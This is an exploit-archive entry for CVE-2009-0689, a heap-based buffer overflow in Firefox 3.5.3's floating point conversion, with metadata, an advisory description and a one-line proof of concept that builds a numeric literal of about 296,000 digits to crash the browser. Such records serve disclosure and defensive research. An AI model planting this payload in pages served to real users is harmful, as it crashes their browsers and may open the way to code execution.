Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow

Author: Alin Rad Pop
type: dos
platform: linux
port: 
date_added: 2009-10-27 
date_updated: 2014-05-12 
verified: 1 
codes: CVE-2009-0689;OSVDB-61189 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/36851/info

Mozilla Firefox is prone to a heap-based buffer-overflow vulnerability.

An attacker can exploit this issue by tricking a victim into visiting a malicious webpage to execute arbitrary code and to cause denial-of-service conditions.

NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities).

NOTE 2: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.

<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>